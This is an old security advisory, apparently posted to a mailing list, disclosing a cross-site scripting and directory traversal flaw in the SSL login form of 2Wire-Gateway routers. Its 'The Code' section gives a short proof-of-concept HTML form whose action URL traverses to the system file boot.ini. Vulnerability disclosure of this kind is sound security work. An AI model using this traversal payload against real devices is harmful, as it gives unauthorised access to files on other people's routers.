<<< Date Index >>>     <<< Thread Index >>>

2Wire-Gateway Cross Site Scripting and Directory Transversal bug in SSL Form



#######################################################################

Application:    2Wire-Gateway/WebGateway
Vendor:           http://www.2wire.com
Versions:        All
Platforms:       Windows
Bug:          Cross Site Scripting and Directory traversal bug in SSL Form
Authentification
Risk:                high
Exploitation:   Remote with browser
Date:               25 Dec 2003
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider@xxxxxxxx
web:                http://theinsider.deep-ice.com

#######################################################################

1) Introduction
2) Bug
3) The Code

#######################################################################

===============
1) Introduction
===============

2Wire is a communication company that sells internet and network related
devices, such
as routers. 2Wire most common routers webserver is "2Wire-Gateway". It
includes a SSL
(Secure Sockets Layer) form authentification.


#######################################################################

======
2) Bug
======

The SSL (Secure Sockets Layer) form authentification has a XSS(Cross Site
Scripting)
that allows an attacker to change the forms action parameters. An attacker
is able to inject script
and urls into the forms action an by that Transverse Directories on the
server.
This allows him to see and download any file in the remote system knowing
the path.
How ever exploiting this vulnerabillity is very hard because the attacker
has to connect
to the target through the browser and accept the SSL connection , exploit is
very hard to reproduce.

#######################################################################

===========
3) The Code
===========

<form name="wralogin" method="get"
action="http://<host>/wra/public/wralogin/?error=61&return=password/../../..
/../boot.ini">
<input type="hidden" name="authcode" value="MUQmqC/sBiXfslfYEooIJg==">
<center>
<input type="password" name="password" value="">
<input type="submit" alt="Submit" width="58" height="19" border="0"></td>
</form>
</body>
</html>

#######################################################################

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."